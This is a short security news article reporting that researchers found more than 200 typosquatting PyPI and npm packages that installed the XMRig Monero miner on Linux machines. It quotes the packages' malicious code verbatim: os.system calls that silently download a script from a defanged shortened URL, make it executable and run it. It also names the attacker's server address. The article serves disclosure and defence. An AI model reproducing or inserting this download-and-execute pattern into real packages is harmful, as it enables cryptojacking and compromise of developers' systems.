Experts Found More than 200 Miner Packages for Linux Systems in PyPI and npm Repositories

Experts again discovered malware in the PyPI and npm repositories – it turned out that more than 200 packages use typesquatting and contain cryptocurrency miners for Linux systems.

The problem was first noticed by independent information security researcher Hauke Lubbers, who found “at least 33 packages” on PyPI that ran the XMRig miner, which mines the Monero cryptocurrency.

Typesquatting was used to distribute them, that is, packages were downloaded if the user mistyped the name of a real popular package (since developers usually download packages through the terminal, typos are common). For example, malware imitated React, argparse and AIOHTTP.

While Lubbers was notifying the PyPI administration of his discovery, the same attacker began publishing another set of 22 packages with the same payload.

The researcher says that all packages were targeted at Linux systems and contained a code fragment that downloaded a Bash script from the attacker’s server through the Bit.ly URL shortening service:

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")

Lubbers explains that the URL on bit.ly points to a script hosted at 80.78.25[.]140:8000. Once executed, this script notifies its operator of the IP address of the compromised host and the successful deployment of the miner.

Hauke Lubbers

Lubbers explains that he is doing this because “the cybersecurity community gets a lot from the open-source ecosystem,” and he feels it is his duty to repay it somehow:

Almost at the same time as Hauke Lubbers, Sonatype analzsts discovered another 186 malicious packages on npm linked to the same URL to download a malicious Bash script.

Fortunately, both repositories quickly removed the typesquatting malware from their platforms, and the malicious packages are unlikely to cause much harm to developers.